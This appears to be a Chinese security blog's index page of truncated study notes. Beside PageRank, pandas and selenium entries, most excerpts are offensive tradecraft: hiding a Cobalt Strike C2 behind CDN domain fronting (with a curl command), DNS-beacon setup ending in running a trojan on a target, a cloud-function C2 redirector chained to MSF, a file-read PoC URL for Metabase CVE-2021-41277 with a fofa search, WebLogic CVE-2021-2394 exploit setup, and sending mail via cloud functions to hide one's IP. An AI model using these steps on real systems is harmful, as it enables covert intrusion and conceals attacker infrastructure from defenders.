pagerank_algorithm
PAGERANK学习笔记一、PageRank简介 PageRank(PR)是谷歌搜索用来在搜索引擎中对网站进行排名的算法,Sergey Brin and Lawrence Page 发布了一篇论文《The Anatomy of a Large-Scale Hypertextual Web Search Engine.》。其中提出PageRank算法,PageRank算法输出一个概率分布,用于表示随机点击链接的人到达任何特定页面的可能性。可以计算任何大小的文档集合的PageRank。PageRank 计算需要通过集合进行多次传递(称为“迭代”),以调整近似的 PageRank 值,以更贴近理论真实值。
在最初的google paper中介绍这个算法的等式是
我们假设页面 A 具有页面 T1…Tn 指向它。参数 d 是一个阻尼系数,可以设置为 0 到 1 之间。我们通常将 d 设置为 0.85。此外,C(A)被定义为从页面A流出的链接数量。
PageRanks在网页上形成概率分布,因此所有网页的PageRanks的总和将为1。
PageRank可以被认 ...
cs域前置隐藏
一、简介1、原理 域前置(Domain fronting),是一种能够隐藏连接真实端点来规避互联网审查的技术。在应用层上运作时,域前置使用户能通过 HTTPS 连接到被屏蔽的服务,而表面上像是在与另一个完全不同的站点通信。
因为在处理HTTPS请求时,CDN会首先将它解密,并根据HTTP Host的值做请求转发,所以用户想要访问一个非法网站,可以使用一个CDN上的合法的域名作为SNI(和TLS服务器名称指示),然后使用想要访问的网站作为HTTP Host与CDN进行HTTPS通信
二、环境准备 VPS服务器、域名
1、添加CDN A记录https://www.cloudflare.com/zh-cn/
2、找到CDN后的IPhttps://dns.aizhan.com/
3、找到使用相同CDN的域名可以通过asn来查询
4、测试 curl 域前置
12curl www.aaa.com -H "Host:www.attack.com" -v#curl //相同CDN的域名 -H "Host:C2的域名 ...
CS_DNS_Beacon
一、环境
Cobalt strike4.4
VPS(服务器)
域名
二、域名解析配置一条A记录,一条NS记录
1、申请一个域名 【WWW.XX#X.TK]
2、配置解析记录 此次使用的是CDN配置
地址:https://dash.cloudflare.com/
123NS记录:NS1 NS1.xxx.tk WWW.xxx.tk A记录: A WWW.xxx.tk IP
3、等待生效 时间比较久
三、CS DNS Beacon1、VPS运行服务端12./teamserver VPS-IP Password#注意53端口,如存在服务,需要关闭 netstat -ano | grep 53
2、本地机器添加监听DNS-HOSTS 使用的是NS的域名
3、生成木马
4、上线 目标机执行木马,但默认情况下主机信息是黑色,需要执行
12checkin mode dns-txt
四、CS上线流量特征 受害机器发送大量的请求包,并且很多流量包中请求和响应的的域名较长
过滤查询域名长度超过一定数值时判定 ...
CobaltStrike使用已知私钥或进程解密
原文:
https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/
一、Cobalt Strike 公钥和私钥Cobalt Strike 信标(客户端)和 Cobalt Strike 团队服务器 (C2) 之间的通信使用 AES 加密(即使它通过 HTTPS 进行)
公钥和私钥存储在文件 .cobaltstrike.beacon_keys 中。这些密钥是在首次使用 Cobalt Strike 团队服务器软件时生成的。
二、使用捕获文件:使用文章中的数据包进行测试。
数据包:https://www.malware-traffic-analysis.net/2021/02/02/index.html
第一步 找到信标1http.request.uri matches "...$"
第二步 查看是否是CS生成的shellcodeMetasploit 和 Cobalt Strike 为 http(s) shell 生成 shel ...
pandas学习_01
设置中文sep=’\t’
csv文件默认的是以逗号为分隔符,但是中文中逗号的使用率很高,爬取中文数据时就容易造成混淆,所以使用pandas写入csv时可以设置参数 sep=’\t’ ,即以tab为分隔符写入。
一、读取和写入1、可读文件
filepath_or_buffer #需要读取的文件及路径
sep / delimiter 列分隔符,普通文本文件,应该都是使用结构化的方式来组织,才能使用dataframe
header 文件中是否需要读取列名的一行,header=None(使用names自定义列名,否则默认0,1,2,…),header=0(将首行设为列名)
names 如果header=None,那么names必须制定!否则就没有列的定义了。
shkiprows= 10 # 跳过前十行
nrows = 10 # 只去前10行
usecols=[0,1,2,…] #需要读取的列,可以是列的位置编号,也可以是列的名称
parse_dates = [‘col_name’] # 指定某行读取为日期格式
index_col = None /False /0,重新生成一列成为 ...
邮件
邮件相关【杂】一、内网邮件服务器 第三方软件HMailServer,可以很容易搭建内网邮件服务器 —适用于windows 亲测有效。留存。【很详细】
https://www.cnblogs.com/tiger-fu/p/7448005.html
https://blog.csdn.net/gelupu/article/details/38325029
二、邮件 建议可以使用云函数发送,可以避免自身的真实IP泄露
pyhon 发送邮箱【带附件】
#注意模块的安装
12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152import smtplibfrom email.mime.text import MIMETextfrom email.mime.multipart import MIMEMultipart#输入发件人邮箱名称email_name = '邮箱【建议写自定义邮箱】'# 输入用户授权码passwd & ...
Metabasegeojson任意文件读取漏洞CVE-2021-41277
Metabasegeojson任意文件读取漏洞CVE-2021-41277一、漏洞描述 在受影响的版本中,自定义 GeoJSON 地图(admin->settings->maps->custom maps->add a map)操作缺少权限验证,攻击者可通过该漏洞获得敏感信息
二、漏洞影响
metabase version < 0.40.5
metabase version >= 1.0.0, < 1.40.5
1、fofa.so搜索1"Metabase geojson"
POC:1https://IP/api/geojson?url=file:xxxxx
云函数和cs并派生到msf
云函数&CS&MSF一、云函数1、新建云函数
2、创建自定义模板
3、下滑页面,写入代码
云函数内容
123456789101112131415161718192021222324252627# -*- coding: utf8 -*-import jsonimport base64import socket,timeimport requestsdef main_handler(event, context): c2 = "http://服务器ip" # event=json.dumps(event) path = event['path'] # # print(path) headers = event['headers'] ip = event['requestContext']['sourceIp'] # # # # # try: headers['X-F ...
CVE-2021-2394
CVE-2021-2394一、简介 oracle公司在2021年7月重要补丁更新报告中,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。
二、复现环境:平台:
12 windows 10 kali2021
工具:
123456 jdk8 (注意,安装目录不可有空格) weblogic_12.2.1.3.0 maven3.8.2 marshalsec exp python3
三、受影响版本123456789 Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0
四、修复方式官方已发布补丁。 ...
selenium模块
一、简介自动化测模块,通过驱动浏览器,模拟浏览器的操作,比如跳转、输入、点击、下拉等,来拿到网页渲染之后的结果,可支持多种浏览器。
二、安装3.1、pip 安装1pip install selenium
3.2、安装驱动注:安装完记得配置环境变量~ [path]
Firefox浏览器驱动:geckodriver
https://github.com/mozilla/geckodriver/releases
Chrome浏览器驱动:
http://chromedriver.storage.googleapis.com/index.html
IE浏览器驱动:IEDriverServer
http://selenium-release.storage.googleapis.com/index.html
Edge浏览器驱动:MicrosoftWebDriver
https://developer.microsoft.com/en-us/microsoft-edge/tools/webdriver/
Opera浏览器驱动:opera ...